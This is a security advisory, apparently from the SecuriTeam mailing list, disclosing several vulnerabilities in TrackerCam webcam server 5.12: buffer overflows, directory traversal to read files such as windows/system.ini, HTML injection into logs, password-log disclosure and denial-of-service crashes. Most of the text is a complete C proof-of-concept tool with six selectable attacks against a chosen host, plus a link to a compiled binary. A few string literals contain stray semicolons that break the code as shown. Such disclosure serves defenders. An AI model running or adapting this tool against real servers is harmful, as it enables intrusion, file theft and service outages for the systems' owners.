The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in TrackerCam
------------------------------------------------------------------------
SUMMARY
" <http://www.trackercam.com/> TrackerCam Software - A complete webcam
solution with a unique color-tracking feature. Works without a TrackerPod
too, if you don't need pan and tilt. TrackerCam Software is a free to
download."
Multiple vulnerabilities in TrackerCam allows an attacker to run arbitrary
code on a vulnerable machine, crash the server and gain access to
sensitive information.
DETAILS
Vulnerable Systems:
* TrackerCam Software version 5.12 and prior
Buffer Overflow in HTTP User-Agent Field:
An HTTP request containing an User-Agent field longer than 216 bytes leads
to a buffer-overflow.
Buffer Overflow in PHP Argument:
Buffer-overflow happens when the server handles an argument longer than
256 bytes passed to any PHP script.
Example:
http://victim_host:8090/any_request.php?aaaaaaaaaaaaaaaaaaaaaaaaa...
Directory Traversal and Full Path Disclosure:
TrackerCam has a PHP script accessible by anyone, that used to watch the
log files from the web interface. Log filename passed through a PHP
argument, there are no security checks in the script allowing the attacker
to be able to choose what file to read and moreover from what location.
Its possible to use a directory traversal attack. If the file doesn't
exist or no arguments are passed, full physical path to ComGetLogFile.php3
script will be showed.
Example:
http://victim_host:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
As can be seen from the example above slash, backslash and hex values are
allowed.
HTML Injection in Log File:
Any login (correct or wrong) is logged in the current log file of the
month. The log file is also visible through a web browser allowing an
attacker to put HTML or any other code supported by the administrator's
browser in the log file through a login request.
Information Disclosure:
Its possible to reach the ComGetLogFile.php3 script without any
restriction. Log file, accessible via directory traversal, contains both
wrong and correct logins, giving possibility to guess working passwords.
IP addresses are stored in the same log file. Each log file contains the
logins of the entire month.
Example of log filename for the current month is:
http://host:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log
Resource Exhaustion:
If the server receives a negative Content-Length, it will show a simple
message box with an "insufficient memory" error, its happens for any
subsequent bad request like that. After about 300 of these consecutive
errors the server crashes.
Proof of concept:
The required winerr.h header can be found at:
<http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html>
http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define usleep sleep
#define TIMEZ 100
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define TIMEZ 100000
#define ONESEC 1
#endif
#define VER "0.1"
#define PORT 8090
#define BUFFSZ 16384
#define REQDOS "GET / HTTP/1.0\r\n" \
"Content-Length: -1\r\n" \
"\r\n"
#define RETADDR "\xde\xc0\xad\xde"
#define UABOF "GET / HTTP/1.0\r\n" \
"User-Agent: " \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaa" RETADDR "\r\n" \
"\r\n"
#define PHPBOF "GET /MessageBoard/messages.php?" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaa" RETADDR " HTTP/1.0\r\n" \
"\r\n"
#define DIRTRAV "GET /tuner/ComGetLogFile.php3?fn="
#define XSS "GET
/MessageBoard/messages.php?userID=unexistent&Group="
#define END " HTTP/1.0\r\n\r\n"
#define POSTDOS "GET / HTTP/1.0\r\n" \
"Content-Length: 2147483647\r\n" \
"\r\n"
#define BOOMSZ 10000000
#define ATTACK(x,y) sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); \
if(sd < 0) std_err();fputs("- connect\n", stdout); \
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
\
< 0) std_err(); \
fputs("- test attack\n", stdout); \
if(send(sd, x, y, 0) \
< 0) std_err();
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i,
len,
attack;
u_short port = PORT;
u_char buff[BUFFSZ + 1],
rotate[] = "|/-\\",
*xsstmp,
*p,
*s;
setbuf(stdout, NULL);
fputs("\n"
"TrackerCam <= 5.12 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n";
"\n", stdout);
if(argc < 3) {
printf("\nUsage: %s <attack> <server> [port(%d)]\n"
"\n"
"Attack:\n"
" 1 = User-Agent buffer-overflow (return address 0x%08lx)\n"
" 2 = PHP argument buffer-overflow (return address 0x%08lx)\n"
" 3 = directory traversal and full path disclosure\n"
" 4 = html injection in log file\n"
" 5 = crash after about 300 multiple error messages\n"
" 6 = crash after sending about %d megabytes of data\n"
"\n", argv[0], port, *(u_long *)RETADDR, *(u_long *)RETADDR,
BOOMSZ / 1000000);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
attack = atoi(argv[1]);
if((attack > 6) || (attack < 0)) {
fputs("\nError: you must choose a valid attack\n\n", stdout);
exit(1);
}
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("\n"
"- target %s : %hu\n"
"- attack %d\n",
inet_ntoa(peer.sin_addr), port,
attack);
if(attack == 1) {
ATTACK(UABOF, sizeof(UABOF) - 1);
close(sd);
} else if(attack == 2) {
ATTACK(PHPBOF, sizeof(PHPBOF) - 1);
close(sd);
} else if(attack == 3) {
fputs("- Enter the path of the remote file to read:\n"
" (like ..\\TrackerCam.pas or an unexistent file for path
disclosure):\n"
" ", stdout);
strcpy(buff, DIRTRAV);
fflush(stdin);
fgets(buff + sizeof(DIRTRAV) - 1, BUFFSZ - sizeof(DIRTRAV) -
sizeof(END), stdin);
len = strlen(buff) - 1;
strcpy(buff + len, END);
len += sizeof(END) - 1;
ATTACK(buff, len);
for(p = buff, i = BUFFSZ; i; p += len, i -= len) {
len = recv(sd, p, i, 0);
if(len <= 0) break;
}
close(sd);
fputc('\n', stdout);
fwrite(buff, p - buff, 1, stdout);
fputc('\n', stdout);
if(!i) printf("\n (reception truncated at %d bytes)\n", BUFFSZ);
} else if(attack == 4) {
fputs("- Enter the HTML/Javascript code you want to inject in the
log file:\n ", stdout);
xsstmp = malloc(BUFFSZ + 1);
if(!xsstmp) std_err();
fflush(stdin);
fgets(xsstmp, BUFFSZ, stdin);
strcpy(buff, DIRTRAV);
for(p = buff + sizeof(DIRTRAV) - 1, s = xsstmp; *s > '\n'; p++,
s++) {
if(*s == ' ') {
memcpy(p, "%20", 3);
p += 2;
} else {
*p = *s;
}
}
free(xsstmp);
strcpy(p, END);
len = (p + sizeof(END) - 1) - buff;
ATTACK(buff, len);
close(sd);
} else if(attack == 5) {
fputs("\nNumber of \"Content-Length: -1\" sent to the server:\n",
stdout);
for(i = 0;; i++) {
printf("%8d\r", i);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
if(!i) std_err();
close(sd);
break;
}
if(send(sd, REQDOS, sizeof(REQDOS) - 1, 0)
< 0) std_err();
close(sd);
usleep(TIMEZ);
}
} else {
ATTACK(POSTDOS, sizeof(POSTDOS) - 1);
memset(buff, 'a', BUFFSZ);
fputs(
"- send data:\n";
" if the progress indicator doesn't move for long time, quit
manually\n", stdout);
len = BOOMSZ / BUFFSZ;
for(i = 0; i < len; i++) {
if(send(sd, buff, BUFFSZ, 0)
< 0) std_err();
fputc(rotate[i & 3], stdout);
fputc('\b', stdout);
}
close(sd);
}
if((attack == 1) || (attack == 2)) {
fputs("- the return address of the server should have been
overwritten but the server continue to run\n\n", stdout);
} else if(attack >= 5) {
fputs("- check if the server is really dead\n", stdout);
sleep(ONESEC);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
fputs("\n Server IS vulnerable!!!\n\n", stdout);
} else {
fputs("\n Server doesn't seem to be vulnerable\n\n",
stdout);
}
close(sd);
} else {
fputs("\nFinished\n\n", stdout);
}
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
The original code with a compiled binary can be found at:
<http://aluigi.altervista.org/poc/tcambof.zip>
http://aluigi.altervista.org/poc/tcambof.zip
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/tcambof-adv.txt>
http://aluigi.altervista.org/adv/tcambof-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
